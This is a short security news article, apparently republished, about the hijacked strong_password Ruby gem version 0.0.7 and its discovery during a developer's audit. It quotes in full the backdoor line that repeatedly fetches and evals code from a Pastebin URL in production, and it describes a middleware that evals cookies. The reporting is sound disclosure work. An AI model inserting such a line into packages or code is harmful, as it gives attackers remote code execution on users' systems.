RubyGems Strong_password Library Hijacked by Threat Actors
Ruby users who updated with strong_password gem version 0.0.7 are urged to roll back to the previous versions after a developer discovered the malicious code in the gem.
The developer named Tute Costa who noticed the inclusion of backdoor while performing regular security audits. He spotted the changes with strong_password on gem hosting service, but not with any branch in GitHub.
“It appeared to have gone from 0.0.6 to 0.0.7, yet the last change in any branch in GitHub was from 6 months ago, and we were up to date with those.”The Strong_password is gem used by developers to check the password strength of the apps.
The strong_password v 0.0.6 was downloaded more than 38,000 times and the backdoored version 0.0.7 was downloaded 537 times.
He further downloaded the gem from Rubygems and compared to the copy in GitHub, following code was added with the latest version and change was appended from a different account than the maintainer’s one.
def !;begin;yield;rescue Exception;end;end !{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}
According to the code, it appears attackers use Pastebin to download the secondary payload, the code runs only if it is running in a production environment with an empty exception.
The attack also injects a middleware that “eval’s cookies named with an __id suffix, only in production, all surrounded by the empty exception handler! a function that’s defined in the hijacked gem.”
The vulnerability has been assigned with CVE identifier CVE-2019-13354. A newer version 0.0.8 of ruby gem with the clean code is released and the details can be seen from the official page of RubyGems.
This post RubyGems Strong_password Library Hijacked by Threat Actors originally appeared on GB Hackers.